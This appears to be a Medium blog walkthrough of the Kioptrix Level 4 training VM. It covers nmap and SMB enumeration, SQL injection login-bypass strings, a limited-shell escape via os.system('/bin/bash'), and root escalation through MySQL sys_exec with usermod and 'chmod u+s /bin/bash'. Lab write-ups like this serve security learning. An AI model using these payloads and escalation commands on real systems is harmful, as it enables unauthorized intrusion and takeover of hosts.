Kioptrix: Level 1.3 (#4)

Vulnhub level4 Kioptrix Complete Walkthrough

Both Level 1,2, 3 are solved with the links below:-




Let’s solve level 4!!!

From here, I run a port scan against my machine to check the open ports/services.

Command: nmap -T4 -p- -A -oN nmap/initials

From initial Scans, you can see that the port number 22, 80, 139 and 445 are in open state.

On Port 22 > SSH Service is up and running with version OpenSSH 4.7p1
On Port 80 > HTTP Service is up and running with version Apache httpd 2.2.8.
On Port 139 and 445 > NetBIOS service is open which means I can easily enumerate SMB for any public facing sharing as well as usernames.

And for enumerating the usernames through NetBIOS using nmap, I ran the following command:

Command: nmap -T4 -p- -A –script=smb-enum-users

As you can see that, I got 5 username (john, loneferret, nobody, robert, root). Scanning with Nikto which is again one of the most popular open source vulnerability scanner.

Command: nikto -host

Let’s move on, and try to access the IP address in your browser i.e. because the PORT 80 is open. And!!! I found a login page, let’s go ahead and attempt SQL Injection by typing single quote (‘) in both username and password field.

So here I confirmed that, the SQL Injection vulnerability is there so try to put some combinations like this:

U > admin, P > admin (Not Accepted)
U > john P > john (Not Accepted)
U > ‘or”=’ P > ‘or”=’ (Not Accepted)
U > ‘ OR 1=1– P > ‘ OR 1=1– (Not Accepted)
U > john P > 1′ or ‘1’=’1 (Accepted)

So here I successfully logged in with username (john) and password (1′ or ‘1’ = ’1). It also seems like we got the John’s real password.

Let’s try to do SSH with username john and password (MyNameIsJohn) by typing the following command in the terminal.

Command: ssh john@

To bypass this limited shell, I used the following

Command: echo os.system(‘/bin/bash’)

that can easily be bypassed with the help of echo or vim command.Okay! now that I have more access as you can see that, I am now able to execute pwd command which tells your present working directory.Furthermore,I grep processes run by root user and mysql service running by typing the following command:

Command: ps -ef | grep root | grep mysql

Let’s see if I can find the D-B username and D-B password details in config file located at /var/www directory.

As you can see that, there is no password, so you can easily bypass MYSQL with UDF . It means you can easily escalate the privileges to root but first of all you need to first check whether the mysql service is running with root privileges or not by the following command:

Command: ls -la /usr/lib/

Yes, the mysql service is running with root privileges, so now I can directly access the database with mysql client.

Command: mysql -h localhost -u root -p

show databases;” will give you a list of all databases hosted at your target IP and also, run a usermod command with sys_exec to give john admin privileges.

Using sys_exec we were able to run usermod which added john to the admin group.

And then I ran sudo su to get the root shell.

You can also use select sys_exec(‘chmod u+s /bin/bash’); for privilege escalation to get the bash shell with full permissions.

AND it’s ROOT!!!, That’s all for this machine,

Until Next Time,

Stay Happy!!

— — — — — — — — — — — — — — -




Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Preparing for CKAD in 1 week!!

How to setup OpenFaaS with Rancher

Weekly Update #8

Understanding Speech Recognition With Python Language

Come and join the Encentive Ambassador Program (Discord)

How to Run Streamlit Apps From Colab

Java Annotations 101

BI Tools: The leaky abstraction no one is talking about

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Fawn Walkthrough

Vulnerability Assessment and Penetration to Linux OS with Nessus

4. Oopsie — Beginner/Learning Box

Triggering Time Delays to Identify Blind SQL Injection Vulnerability